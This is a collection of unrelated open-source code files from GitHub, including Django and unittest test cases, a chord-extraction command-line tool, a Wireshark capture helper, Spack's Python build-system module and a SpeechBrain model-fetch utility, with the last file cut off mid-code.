CharacterTextSplitter(chunk_size=1000, chunk_overlap=100, separator=\".\")\n texts = text_splitter.split_text(text)\n for t in texts:\n documents.append(Document(page_content=t))\n return documents\n\n\ndef main(doc_location: str ='onepoint_chat'):\n \"\"\"\n Main entry point for the application.\n It loads all texts from a specific folder and specific web 
pages, \n    creates the vector database and initializes the user interface.\n    :param doc_location: The location of the CSV files\n    \"\"\"\n    logger.info(f\"Using doc location {doc_location}.\")\n    texts, doc_path = load_texts(doc_location=doc_location)\n    website_texts = load_website_texts([\n        'https://www.onepointltd.com/',\n        'https://www.onepointltd.com/do-data-better/'\n    ])\n    texts.extend(website_texts)\n    docsearch = extract_embeddings(texts=texts, doc_path=Path(doc_path))\n    init_streamlit(docsearch=docsearch, texts=texts)\n\n\nif __name__ == \"__main__\":\n    main(os.environ['DOC_LOCATION'])","repo_name":"gilfernandes/onepoint_chat","sub_path":"chat_main.py","file_name":"chat_main.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"31446816915","text":"import os\nfrom django.test import TestCase, RequestFactory\nfrom rest_framework.parsers import FileUploadParser\nfrom django.contrib.auth.models import Group, User\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.test import APIRequestFactory, APIClient\nfrom base_app.models.base_models import DataFile\nfrom base_app.views import data_files\nfrom base_app.settings import BASE_DIR, DATA_FILE_URL\n\n\nclass DataFilesTestCase(TestCase):\n    \"\"\"\n    Test the data file API endpoint\n    \"\"\"\n\n    # unittest only invokes the camelCase setUp/tearDown hooks, so the\n    # snake_case names would never run and the tests would fail on\n    # missing attributes\n    def setUp(self):\n        self.factory = APIRequestFactory()\n        self.client = APIClient()\n        self.parser = FileUploadParser()\n        self.user = User.objects.create_user(\n            username=\"testuser\", password=\"testpassword\"\n        )\n        # self.token = Token.objects.create(user=self.user)\n        self.researcher_group = Group.objects.create(name=\"Researcher\")\n        self.user.groups.add(self.researcher_group)\n        self.test_file_name = \"test_api_file.txt\"\n        self.test_file_path = os.path.join(BASE_DIR, self.test_file_name)\n        try:\n            # Attempt to create a new file for writing\n            with open(self.test_file_path, \"x\") as file:\n                self.file_data = file.write(\"Hello, World!\")\n            # You can perform additional write operations if needed\n        except FileExistsError:\n            # File already exists, handle the case accordingly\n            pass\n\n        self.file_data = {\"file\": open(self.test_file_path, \"rb\")}\n\n    def test_data_files_get(self):\n        request = self.factory.get(DATA_FILE_URL)\n        response = data_files(request)\n        self.assertEqual(response.status_code, 200)\n\n    def test_data_files_post_authorized(self):\n        self.client.force_authenticate(user=self.user)\n        request = self.factory.post(\n            DATA_FILE_URL, data=self.file_data, format=\"multipart\"\n        )\n        request.user = self.user\n        response = data_files(request)\n        self.assertEqual(response.status_code, 201)\n        self.assertTrue(\n            DataFile.objects.filter(file__icontains=self.test_file_name).exists()\n        )\n\n    def test_data_files_post_unauthorized(self):\n        request = self.factory.post(\n            DATA_FILE_URL, data=self.file_data, format=\"multipart\"\n        )\n        response = data_files(request)\n        self.assertEqual(response.status_code, 401)\n        self.assertFalse(\n            DataFile.objects.filter(file__icontains=self.test_file_name).exists()\n        )\n\n    def tearDown(self):\n        \"\"\"\n        Close the file and clean the test files\n        \"\"\"\n        self.file_data[\"file\"].close()\n        if os.path.exists(self.test_file_path):\n            # File exists, remove it\n            
os.remove(self.test_file_path)\n","repo_name":"steno-aarhus/seedcase","sub_path":"seedcase/base_app/test/test_data_file_api.py","file_name":"test_data_file_api.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"10760103597","text":"import argparse\nimport sys\nimport os\n\nfrom pychords.chordino import Chordino\n\n\ndef perform_extraction(args):\n \"\"\"\n Extracts song chords\n \"\"\"\n\n ch = Chordino(\n use_nnls=args.use_nnls,\n use_hart_notation=args.use_hart_notation,\n roll_on=args.roll_on,\n local_tunning=args.local_tunning,\n spectral_whitening=args.whitening,\n spectral_shape=args.shape,\n boost_n_likelihood=args.boost_n,\n )\n return ch.extract(args.input_file)\n\n\ndef print_chords(chords):\n for chord in chords:\n print(chord.chord, \" - \", chord.timestamp)\n\n\ndef parse_arguments(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument('input_file')\n parser.add_argument('--nnls-chroma-path')\n parser.add_argument(\n '--use-nnls', action='store_true', default=False)\n parser.add_argument(\n '--use-hart-notation', action='store_true', default=False)\n parser.add_argument(\n '--local-tunning', action='store_true', default=False)\n parser.add_argument(\n '--roll-on', type=float, default=1.0, help='Between 1 0 and 5')\n parser.add_argument(\n '--whitening', type=float, default=1.0, help='Between 0 and 1')\n parser.add_argument(\n '--shape', type=float, default=0.7, help='Between 0.5 and 0.9')\n parser.add_argument(\n '--boost-n', type=float, default=0.1, help='Between 0 and 1')\n\n return parser.parse_args(argv)\n\n\ndef main():\n args = parse_arguments(sys.argv[1:])\n\n if args.nnls_chroma_path:\n os.environ['VAMP_PATH'] = args.nnls_chroma_path\n chords = perform_extraction(args)\n\n print_chords(chords)\n\n\nmain()\n","repo_name":"joaquinco/pychords","sub_path":"pychords/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19583475760","text":"import unittest\nfrom system_class import System\nfrom stock_class import Stock\nfrom user_class import User\nfrom tag_class import Tag\n\nclass TestClasses(unittest.TestCase):\n\n def test_add_book_that_already_exists(self):\n book = System() \n book.delete_book('112-457-128-25')\n book.add_book('Singing', '112-457-128-25', '2017-03-04', 15, 'Craig', 'Chen')\n raised = False\n try:\n book.add_book('Singing', '112-457-128-25', '2017-03-04', 15, 'Craig', 'Chen')\n except:\n raised = True\n self.assertFalse(raised)\n\n def test_negative_stock_change(self):\n stock = Stock() \n with self.assertRaises(SystemExit):\n stock.increment_stock('13', -4)\n\n def test_add_more_than_one_tag(self):\n tag = Tag()\n raised = False\n try:\n tag.add_tag('112-457-128-25', 'Thriller')\n except:\n raised = True\n self.assertFalse(raised)\n \n def test_delete_book_not_in_system(self):\n book = System()\n raised = False\n try:\n book.delete_book('13')\n except:\n raised = True\n self.assertFalse(raised)\n\n def test_delete_book_in_system(self):\n book = System()\n raised = False\n try:\n book.delete_book('112-457-128-25')\n except:\n raised = True\n self.assertFalse(raised)\n\nif __name__ == '__main__':\n 
unittest.main()","repo_name":"ScientistCoco/book_store","sub_path":"test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29370198789","text":"__author__ = 'Sebastian Rieger'\n\nimport os;\n\nncat_path = \"C:\\\\Users\\\\Sebastian\\\\Downloads\\\\ncat\"\nwireshark_path = \"\\\"C:\\\\Program Files\\\\Wireshark\\\\Wireshark.exe\\\"\"\nvirl_host = \"192.168.0.150\"\npcap_port = input(\"Please enter the port of the live capture: \")\n\nos.system(ncat_path + \" \" + virl_host + \" \" + str(pcap_port) + \" | \" + wireshark_path + \" -k -i -\")\n","repo_name":"rlaneyjr/VIRL_Projects","sub_path":"virl-utils/capture-from-socket.py","file_name":"capture-from-socket.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32111252299","text":"given_list = input().split(\" \")\n\n\ndef rounded_numbers(some_list):\n new_list = []\n for num in some_list:\n current_num = float(num)\n rounded_num = round(current_num)\n new_list.append(rounded_num)\n return new_list\n\n\nprint(rounded_numbers(given_list))\n\n","repo_name":"pepapopova/SoftUni-Courses","sub_path":"Fundamentals/Functions/rounding.py","file_name":"rounding.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13850004204","text":"import inspect\nimport os\nimport re\nimport shutil\nimport stat\nfrom typing import Optional\n\nimport archspec\n\nimport llnl.util.filesystem as fs\nimport llnl.util.lang as lang\nimport llnl.util.tty as tty\n\nimport spack.builder\nimport spack.config\nimport spack.deptypes as dt\nimport spack.detection\nimport spack.multimethod\nimport spack.package_base\nimport spack.spec\nimport spack.store\nfrom spack.directives import build_system, depends_on, extends, maintainers\nfrom spack.error import NoHeadersError, NoLibrariesError, SpecError\nfrom spack.install_test import test_part\nfrom spack.util.executable import Executable\nfrom spack.version import Version\n\nfrom ._checks import BaseBuilder, execute_install_time_tests\n\n\nclass PythonExtension(spack.package_base.PackageBase):\n maintainers(\"adamjstewart\")\n\n @property\n def import_modules(self):\n \"\"\"Names of modules that the Python package provides.\n\n These are used to test whether or not the installation succeeded.\n These names generally come from running:\n\n .. code-block:: python\n\n >> import setuptools\n >> setuptools.find_packages()\n\n in the source tarball directory. 
If the module names are incorrectly\n detected, this property can be overridden by the package.\n\n Returns:\n list: list of strings of module names\n \"\"\"\n modules = []\n pkg = self.spec[\"python\"].package\n\n # Packages may be installed in platform-specific or platform-independent\n # site-packages directories\n for directory in {pkg.platlib, pkg.purelib}:\n root = os.path.join(self.prefix, directory)\n\n # Some Python libraries are packages: collections of modules\n # distributed in directories containing __init__.py files\n for path in fs.find(root, \"__init__.py\", recursive=True):\n modules.append(\n path.replace(root + os.sep, \"\", 1)\n .replace(os.sep + \"__init__.py\", \"\")\n .replace(\"/\", \".\")\n )\n\n # Some Python libraries are modules: individual *.py files\n # found in the site-packages directory\n for path in fs.find(root, \"*.py\", recursive=False):\n modules.append(\n path.replace(root + os.sep, \"\", 1).replace(\".py\", \"\").replace(\"/\", \".\")\n )\n\n modules = [\n mod\n for mod in modules\n if re.match(\"[a-zA-Z0-9._]+$\", mod) and not any(map(mod.startswith, self.skip_modules))\n ]\n\n tty.debug(\"Detected the following modules: {0}\".format(modules))\n\n return modules\n\n @property\n def skip_modules(self):\n \"\"\"Names of modules that should be skipped when running tests.\n\n These are a subset of import_modules. If a module has submodules,\n they are skipped as well (meaning a.b is skipped if a is contained).\n\n Returns:\n list: list of strings of module names\n \"\"\"\n return []\n\n def view_file_conflicts(self, view, merge_map):\n \"\"\"Report all file conflicts, excepting special cases for python.\n Specifically, this does not report errors for duplicate\n __init__.py files for packages in the same namespace.\n \"\"\"\n conflicts = list(dst for src, dst in merge_map.items() if os.path.exists(dst))\n\n if conflicts and self.py_namespace:\n ext_map = view.extensions_layout.extension_map(self.extendee_spec)\n namespaces = set(x.package.py_namespace for x in ext_map.values())\n namespace_re = r\"site-packages/{0}/__init__.py\".format(self.py_namespace)\n find_namespace = lang.match_predicate(namespace_re)\n if self.py_namespace in namespaces:\n conflicts = list(x for x in conflicts if not find_namespace(x))\n\n return conflicts\n\n def add_files_to_view(self, view, merge_map, skip_if_exists=True):\n if not self.extendee_spec:\n return super().add_files_to_view(view, merge_map, skip_if_exists)\n\n bin_dir = self.spec.prefix.bin\n python_prefix = self.extendee_spec.prefix\n python_is_external = self.extendee_spec.external\n global_view = fs.same_path(python_prefix, view.get_projection_for_spec(self.spec))\n for src, dst in merge_map.items():\n if os.path.exists(dst):\n continue\n elif global_view or not fs.path_contains_subdirectory(src, bin_dir):\n view.link(src, dst)\n elif not os.path.islink(src):\n shutil.copy2(src, dst)\n is_script = fs.is_nonsymlink_exe_with_shebang(src)\n if is_script and not python_is_external:\n fs.filter_file(\n python_prefix,\n os.path.abspath(view.get_projection_for_spec(self.spec)),\n dst,\n )\n else:\n orig_link_target = os.path.realpath(src)\n new_link_target = os.path.abspath(merge_map[orig_link_target])\n view.link(new_link_target, dst)\n\n def remove_files_from_view(self, view, merge_map):\n ignore_namespace = False\n if self.py_namespace:\n ext_map = view.extensions_layout.extension_map(self.extendee_spec)\n remaining_namespaces = set(\n spec.package.py_namespace for name, spec in ext_map.items() if name != 
self.name\n )\n if self.py_namespace in remaining_namespaces:\n namespace_init = lang.match_predicate(\n r\"site-packages/{0}/__init__.py\".format(self.py_namespace)\n )\n ignore_namespace = True\n\n bin_dir = self.spec.prefix.bin\n global_view = self.extendee_spec.prefix == view.get_projection_for_spec(self.spec)\n\n to_remove = []\n for src, dst in merge_map.items():\n if ignore_namespace and namespace_init(dst):\n continue\n\n if global_view or not fs.path_contains_subdirectory(src, bin_dir):\n to_remove.append(dst)\n else:\n os.remove(dst)\n\n view.remove_files(to_remove)\n\n def test_imports(self):\n \"\"\"Attempts to import modules of the installed package.\"\"\"\n\n # Make sure we are importing the installed modules,\n # not the ones in the source directory\n python = inspect.getmodule(self).python\n for module in self.import_modules:\n with test_part(\n self,\n f\"test_imports_{module}\",\n purpose=f\"checking import of {module}\",\n work_dir=\"spack-test\",\n ):\n python(\"-c\", f\"import {module}\")\n\n def update_external_dependencies(self, extendee_spec=None):\n \"\"\"\n Ensure all external python packages have a python dependency\n\n If another package in the DAG depends on python, we use that\n python for the dependency of the external. If not, we assume\n that the external PythonPackage is installed into the same\n directory as the python it depends on.\n \"\"\"\n # TODO: Include this in the solve, rather than instantiating post-concretization\n if \"python\" not in self.spec:\n if extendee_spec:\n python = extendee_spec\n elif \"python\" in self.spec.root:\n python = self.spec.root[\"python\"]\n else:\n python = self.get_external_python_for_prefix()\n if not python.concrete:\n repo = spack.repo.PATH.repo_for_pkg(python)\n python.namespace = repo.namespace\n\n # Ensure architecture information is present\n if not python.architecture:\n host_platform = spack.platforms.host()\n host_os = host_platform.operating_system(\"default_os\")\n host_target = host_platform.target(\"default_target\")\n python.architecture = spack.spec.ArchSpec(\n (str(host_platform), str(host_os), str(host_target))\n )\n else:\n if not python.architecture.platform:\n python.architecture.platform = spack.platforms.host()\n if not python.architecture.os:\n python.architecture.os = \"default_os\"\n if not python.architecture.target:\n python.architecture.target = archspec.cpu.host().family.name\n\n # Ensure compiler information is present\n if not python.compiler:\n python.compiler = self.spec.compiler\n\n python.external_path = self.spec.external_path\n python._mark_concrete()\n self.spec.add_dependency_edge(python, depflag=dt.BUILD | dt.LINK | dt.RUN, virtuals=())\n\n def get_external_python_for_prefix(self):\n \"\"\"\n For an external package that extends python, find the most likely spec for the python\n it depends on.\n\n First search: an \"installed\" external that shares a prefix with this package\n Second search: a configured external that shares a prefix with this package\n Third search: search this prefix for a python package\n\n Returns:\n spack.spec.Spec: The external Spec for python most likely to be compatible with self.spec\n \"\"\"\n python_externals_installed = [\n s for s in spack.store.STORE.db.query(\"python\") if s.prefix == self.spec.external_path\n ]\n if python_externals_installed:\n return python_externals_installed[0]\n\n python_external_config = spack.config.get(\"packages:python:externals\", [])\n python_externals_configured = [\n 
spack.spec.parse_with_version_concrete(item[\"spec\"])\n for item in python_external_config\n if item[\"prefix\"] == self.spec.external_path\n ]\n if python_externals_configured:\n return python_externals_configured[0]\n\n python_externals_detection = spack.detection.by_path(\n [\"python\"], path_hints=[self.spec.external_path]\n )\n\n python_externals_detected = [\n d.spec\n for d in python_externals_detection.get(\"python\", [])\n if d.prefix == self.spec.external_path\n ]\n if python_externals_detected:\n return python_externals_detected[0]\n\n raise StopIteration(\"No external python could be detected for %s to depend on\" % self.spec)\n\n\nclass PythonPackage(PythonExtension):\n \"\"\"Specialized class for packages that are built using pip.\"\"\"\n\n #: Package name, version, and extension on PyPI\n pypi: Optional[str] = None\n\n # To be used in UI queries that require to know which\n # build-system class we are using\n build_system_class = \"PythonPackage\"\n #: Legacy buildsystem attribute used to deserialize and install old specs\n legacy_buildsystem = \"python_pip\"\n\n #: Callback names for install-time test\n install_time_test_callbacks = [\"test\"]\n\n build_system(\"python_pip\")\n\n with spack.multimethod.when(\"build_system=python_pip\"):\n extends(\"python\")\n depends_on(\"py-pip\", type=\"build\")\n # FIXME: technically wheel is only needed when building from source, not when\n # installing a downloaded wheel, but I don't want to add wheel as a dep to every\n # package manually\n depends_on(\"py-wheel\", type=\"build\")\n\n py_namespace: Optional[str] = None\n\n @lang.classproperty\n def homepage(cls):\n if cls.pypi:\n name = cls.pypi.split(\"/\")[0]\n return \"https://pypi.org/project/\" + name + \"/\"\n\n @lang.classproperty\n def url(cls):\n if cls.pypi:\n return \"https://files.pythonhosted.org/packages/source/\" + cls.pypi[0] + \"/\" + cls.pypi\n\n @lang.classproperty\n def list_url(cls):\n if cls.pypi:\n name = cls.pypi.split(\"/\")[0]\n return \"https://pypi.org/simple/\" + name + \"/\"\n\n @property\n def headers(self):\n \"\"\"Discover header files in platlib.\"\"\"\n\n # Remove py- prefix in package name\n name = self.spec.name[3:]\n\n # Headers may be in either location\n include = self.prefix.join(self.spec[\"python\"].package.include).join(name)\n platlib = self.prefix.join(self.spec[\"python\"].package.platlib).join(name)\n headers = fs.find_all_headers(include) + fs.find_all_headers(platlib)\n\n if headers:\n return headers\n\n msg = \"Unable to locate {} headers in {} or {}\"\n raise NoHeadersError(msg.format(self.spec.name, include, platlib))\n\n @property\n def libs(self):\n \"\"\"Discover libraries in platlib.\"\"\"\n\n # Remove py- prefix in package name\n name = self.spec.name[3:]\n\n root = self.prefix.join(self.spec[\"python\"].package.platlib).join(name)\n\n libs = fs.find_all_libraries(root, recursive=True)\n\n if libs:\n return libs\n\n msg = \"Unable to recursively locate {} libraries in {}\"\n raise NoLibrariesError(msg.format(self.spec.name, root))\n\n\ndef fixup_shebangs(path: str, old_interpreter: bytes, new_interpreter: bytes):\n # Recurse into the install prefix and fixup shebangs\n exe = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH\n dirs = [path]\n hardlinks = set()\n\n while dirs:\n with os.scandir(dirs.pop()) as entries:\n for entry in entries:\n if entry.is_dir(follow_symlinks=False):\n dirs.append(entry.path)\n continue\n\n # Only consider files, not symlinks\n if not entry.is_file(follow_symlinks=False):\n continue\n\n lstat = 
entry.stat(follow_symlinks=False)\n\n # Skip over files that are not executable\n if not (lstat.st_mode & exe):\n continue\n\n # Don't modify hardlinks more than once\n if lstat.st_nlink > 1:\n key = (lstat.st_ino, lstat.st_dev)\n if key in hardlinks:\n continue\n hardlinks.add(key)\n\n # Finally replace shebangs if any.\n with open(entry.path, \"rb+\") as f:\n contents = f.read(2)\n if contents != b\"#!\":\n continue\n contents += f.read()\n\n if old_interpreter not in contents:\n continue\n\n f.seek(0)\n f.write(contents.replace(old_interpreter, new_interpreter))\n f.truncate()\n\n\n@spack.builder.builder(\"python_pip\")\nclass PythonPipBuilder(BaseBuilder):\n phases = (\"install\",)\n\n #: Names associated with package methods in the old build-system format\n legacy_methods = (\"test\",)\n\n #: Same as legacy_methods, but the signature is different\n legacy_long_methods = (\"install_options\", \"global_options\", \"config_settings\")\n\n #: Names associated with package attributes in the old build-system format\n legacy_attributes = (\"build_directory\", \"install_time_test_callbacks\")\n\n #: Callback names for install-time test\n install_time_test_callbacks = [\"test\"]\n\n @staticmethod\n def std_args(cls):\n return [\n # Verbose\n \"-vvv\",\n # Disable prompting for input\n \"--no-input\",\n # Disable the cache\n \"--no-cache-dir\",\n # Don't check to see if pip is up-to-date\n \"--disable-pip-version-check\",\n # Install packages\n \"install\",\n # Don't install package dependencies\n \"--no-deps\",\n # Overwrite existing packages\n \"--ignore-installed\",\n # Use env vars like PYTHONPATH\n \"--no-build-isolation\",\n # Don't warn that prefix.bin is not in PATH\n \"--no-warn-script-location\",\n # Ignore the PyPI package index\n \"--no-index\",\n ]\n\n @property\n def build_directory(self):\n \"\"\"The root directory of the Python package.\n\n This is usually the directory containing one of the following files:\n\n * ``pyproject.toml``\n * ``setup.cfg``\n * ``setup.py``\n \"\"\"\n return self.pkg.stage.source_path\n\n def config_settings(self, spec, prefix):\n \"\"\"Configuration settings to be passed to the PEP 517 build backend.\n\n Requires pip 22.1 or newer.\n\n Args:\n spec (spack.spec.Spec): build spec\n prefix (spack.util.prefix.Prefix): installation prefix\n\n Returns:\n dict: dictionary of KEY, VALUE settings\n \"\"\"\n return {}\n\n def install_options(self, spec, prefix):\n \"\"\"Extra arguments to be supplied to the setup.py install command.\n\n Requires pip 23.0 or older.\n\n Args:\n spec (spack.spec.Spec): build spec\n prefix (spack.util.prefix.Prefix): installation prefix\n\n Returns:\n list: list of options\n \"\"\"\n return []\n\n def global_options(self, spec, prefix):\n \"\"\"Extra global options to be supplied to the setup.py call before the install\n or bdist_wheel command.\n\n Deprecated in pip 23.1.\n\n Args:\n spec (spack.spec.Spec): build spec\n prefix (spack.util.prefix.Prefix): installation prefix\n\n Returns:\n list: list of options\n \"\"\"\n return []\n\n @property\n def _build_venv_path(self):\n \"\"\"Return the path to the virtual environment used for building when\n python is external.\"\"\"\n return os.path.join(self.spec.package.stage.path, \"build_env\")\n\n @property\n def _build_venv_python(self) -> Executable:\n \"\"\"Return the Python executable in the build virtual environment when\n python is external.\"\"\"\n return Executable(os.path.join(self._build_venv_path, \"bin\", \"python\"))\n\n def install(self, pkg, spec, prefix):\n 
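# [Editor's sketch] The per-file core of fixup_shebangs() above, isolated for
# clarity; the file path and interpreter paths below are hypothetical. Only
# files that begin with b"#!" and mention the old interpreter are rewritten
# in place.
def rewrite_shebang(path: str, old: bytes, new: bytes) -> bool:
    with open(path, "rb+") as f:
        head = f.read(2)
        if head != b"#!":
            return False
        contents = head + f.read()
        if old not in contents:
            return False
        f.seek(0)
        f.write(contents.replace(old, new))
        f.truncate()  # the replacement interpreter path may be shorter
    return True

# rewrite_shebang("/opt/pkg/bin/tool", b"/tmp/build_env/bin/python", b"/usr/bin/python3.11")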
\"\"\"Install everything from build directory.\"\"\"\n python: Executable = spec[\"python\"].command\n # Since we invoke pip with --no-build-isolation, we have to make sure that pip cannot\n # execute hooks from user and system site-packages.\n if spec[\"python\"].external:\n # There are no environment variables to disable the system site-packages, so we use a\n # virtual environment instead. The downside of this approach is that pip produces\n # incorrect shebangs that refer to the virtual environment, which we have to fix up.\n python(\"-m\", \"venv\", \"--without-pip\", self._build_venv_path)\n pip = self._build_venv_python\n else:\n # For a Spack managed Python, system site-packages is empty/unused by design, so it\n # suffices to disable user site-packages, for which there is an environment variable.\n pip = python\n pip.add_default_env(\"PYTHONNOUSERSITE\", \"1\")\n pip.add_default_arg(\"-m\")\n pip.add_default_arg(\"pip\")\n\n args = PythonPipBuilder.std_args(pkg) + [\"--prefix=\" + prefix]\n\n for key, value in self.config_settings(spec, prefix).items():\n if spec[\"py-pip\"].version < Version(\"22.1\"):\n raise SpecError(\n \"'{}' package uses 'config_settings' which is only supported by \"\n \"pip 22.1+. Add the following line to the package to fix this:\\n\\n\"\n ' depends_on(\"py-pip@22.1:\", type=\"build\")'.format(spec.name)\n )\n\n args.append(\"--config-settings={}={}\".format(key, value))\n\n for option in self.install_options(spec, prefix):\n args.append(\"--install-option=\" + option)\n for option in self.global_options(spec, prefix):\n args.append(\"--global-option=\" + option)\n\n if pkg.stage.archive_file and pkg.stage.archive_file.endswith(\".whl\"):\n args.append(pkg.stage.archive_file)\n else:\n args.append(\".\")\n\n with fs.working_dir(self.build_directory):\n pip(*args)\n\n @spack.builder.run_after(\"install\")\n def fixup_shebangs_pointing_to_build(self):\n \"\"\"When installing a package using an external python, we use a temporary virtual\n environment which improves build isolation. The downside is that pip produces shebangs\n that point to the temporary virtual environment. This method fixes them up to point to the\n underlying Python.\"\"\"\n # No need to fixup shebangs if no build venv was used. 
(this post install function also\n # runs when install was overridden in another package, so check existence of the venv path)\n if not os.path.exists(self._build_venv_path):\n return\n\n # Use sys.executable, since that's what pip uses.\n interpreter = (\n lambda python: python(\"-c\", \"import sys; print(sys.executable)\", output=str)\n .strip()\n .encode(\"utf-8\")\n )\n\n fixup_shebangs(\n path=self.spec.prefix,\n old_interpreter=interpreter(self._build_venv_python),\n new_interpreter=interpreter(self.spec[\"python\"].command),\n )\n\n spack.builder.run_after(\"install\")(execute_install_time_tests)\n","repo_name":"WAAutoMaton/spack","sub_path":"lib/spack/spack/build_systems/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":21532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12038074174","text":"\"\"\"Downloads or otherwise fetches pretrained models\n\nAuthors:\n * Aku Rouhe 2021\n * Samuele Cornell 2021\n * Andreas Nautsch 2022, 2023\n\"\"\"\nimport urllib.request\nimport urllib.error\nimport pathlib\nimport logging\nfrom enum import Enum\nimport huggingface_hub\nfrom typing import Union\nfrom collections import namedtuple\nfrom requests.exceptions import HTTPError\n\nlogger = logging.getLogger(__name__)\n\n\ndef _missing_ok_unlink(path):\n # missing_ok=True was added to Path.unlink() in Python 3.8\n # This does the same.\n try:\n path.unlink()\n except FileNotFoundError:\n pass\n\n\nclass FetchFrom(Enum):\n \"\"\"Designator where to fetch models/audios from.\n\n Note: HuggingFace repository sources and local folder sources may be confused if their source type is undefined.\n \"\"\"\n\n LOCAL = 1\n HUGGING_FACE = 2\n URI = 3\n\n\n# For easier use\nFetchSource = namedtuple(\"FetchSource\", [\"FetchFrom\", \"path\"])\nFetchSource.__doc__ = (\n \"\"\"NamedTuple describing a source path and how to fetch it\"\"\"\n)\nFetchSource.__hash__ = lambda self: hash(self.path)\nFetchSource.encode = lambda self, *args, **kwargs: \"_\".join(\n (str(self.path), str(self.FetchFrom))\n).encode(*args, **kwargs)\n# FetchSource.__str__ = lambda self: str(self.path)\n\n\ndef fetch(\n filename,\n source,\n savedir=\"./pretrained_model_checkpoints\",\n overwrite=False,\n save_filename=None,\n use_auth_token=False,\n revision=None,\n cache_dir: Union[str, pathlib.Path, None] = None,\n silent_local_fetch: bool = False,\n):\n \"\"\"Ensures you have a local copy of the file, returns its path\n\n In case the source is an external location, downloads the file. In case\n the source is already accessible on the filesystem, creates a symlink in\n the savedir. Thus, the side effects of this function always look similar:\n savedir/save_filename can be used to access the file. And save_filename\n defaults to the filename arg.\n\n Arguments\n ---------\n filename : str\n Name of the file including extensions.\n source : str or FetchSource\n Where to look for the file. This is interpreted in special ways:\n First, if the source begins with \"http://\" or \"https://\", it is\n interpreted as a web address and the file is downloaded.\n Second, if the source is a valid directory path, a symlink is\n created to the file.\n Otherwise, the source is interpreted as a Huggingface model hub ID, and\n the file is downloaded from there.\n savedir : str\n Path where to save downloads/symlinks.\n overwrite : bool\n If True, always overwrite existing savedir/filename file and download\n or recreate the link. 
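# [Editor's example] Constructing a FetchSource to pin down where fetch()
# (defined below) looks, instead of letting it guess from the path string;
# the HuggingFace repo id is illustrative.
src = FetchSource(FetchFrom.HUGGING_FACE, "speechbrain/spkrec-ecapa-voxceleb")
fetch_from, path = src       # NamedTuple unpacking, as done inside fetch()
key = src.encode("utf-8")    # b"<path>_FetchFrom.HUGGING_FACE", via the patched encode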
If False (as by default), if savedir/filename\n        exists, assume it is correct and don't download/relink. Note that\n        Huggingface local cache is always used - with overwrite=True we just\n        relink from the local cache.\n    save_filename : str\n        The filename to use for saving this file. Defaults to filename if not\n        given.\n    use_auth_token : bool (default: False)\n        If True, Huggingface's auth_token will be used to load private models from the HuggingFace Hub;\n        default is False because the majority of models are public.\n    revision : str\n        The model revision corresponding to the HuggingFace Hub model revision.\n        This is particularly useful if you wish to pin your code to a particular\n        version of a model hosted at HuggingFace.\n    cache_dir: str or Path (default: None)\n        Location of HuggingFace cache for storing pre-trained models, to which symlinks are created.\n    silent_local_fetch: bool (default: False)\n        Suppress logging messages (quiet mode).\n\n    Returns\n    -------\n    pathlib.Path\n        Path to file on local file system.\n\n    Raises\n    ------\n    ValueError\n        If file is not found\n    \"\"\"\n    if save_filename is None:\n        save_filename = filename\n    savedir = pathlib.Path(savedir)\n    savedir.mkdir(parents=True, exist_ok=True)\n    fetch_from = None\n    if isinstance(source, FetchSource):\n        fetch_from, source = source\n    sourcefile = f\"{source}/{filename}\"\n    destination = savedir / save_filename\n    if destination.exists() and not overwrite:\n        MSG = f\"Fetch {filename}: Using existing file/symlink in {str(destination)}.\"\n        logger.info(MSG)\n        return destination\n\n    if pathlib.Path(source).is_dir() and fetch_from not in [\n        FetchFrom.HUGGING_FACE,\n        FetchFrom.URI,\n    ]:\n        # Interpret source as local directory path & create a link and return it as destination\n        sourcepath = pathlib.Path(sourcefile).absolute()\n        _missing_ok_unlink(destination)\n        destination.symlink_to(sourcepath)\n        MSG = f\"Destination {filename}: local file in {str(sourcepath)}.\"\n        if not silent_local_fetch:\n            logger.info(MSG)\n        return destination\n    if (\n        str(source).startswith(\"http:\") or str(source).startswith(\"https:\")\n    ) or fetch_from is FetchFrom.URI:\n        # Interpret source as web address.\n        MSG = (\n            f\"Fetch {filename}: Downloading from normal URL {str(sourcefile)}.\"\n        )\n        logger.info(MSG)\n        # Download\n        try:\n            urllib.request.urlretrieve(sourcefile, destination)\n        except urllib.error.URLError:\n            raise ValueError(\n                f\"Interpreted {source} as web address, but could not download.\"\n            )\n    else:  # FetchFrom.HUGGING_FACE check is skipped (no other option right now)\n        # Interpret source as huggingface hub ID\n        # Use huggingface hub's fancy cached download.\n        MSG = f\"Fetch {filename}: Delegating to Huggingface hub, source {str(source)}.\"\n        logger.info(MSG)\n        try:\n            fetched_file = huggingface_hub.hf_hub_download(\n                repo_id=source,\n                filename=filename,\n                use_auth_token=use_auth_token,\n                revision=revision,\n                cache_dir=cache_dir,\n            )\n            logger.info(f\"HF fetch: {fetched_file}\")\n        except HTTPError as e:\n            if \"404 Client Error\" in str(e):\n                raise ValueError(\"File not found on HF hub\")\n            else:\n                raise\n\n        # Huggingface hub downloads to etag filename, symlink to the expected one:\n        sourcepath = pathlib.Path(fetched_file).absolute()\n        _missing_ok_unlink(destination)\n        destination.symlink_to(sourcepath)\n    return 
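# [Editor's example] Typical calls covering the three source types handled by
# fetch() above; all paths and ids are illustrative.
p1 = fetch("hyperparams.yaml", source="speechbrain/asr-crdnn-rnnlm-librispeech")  # HF hub
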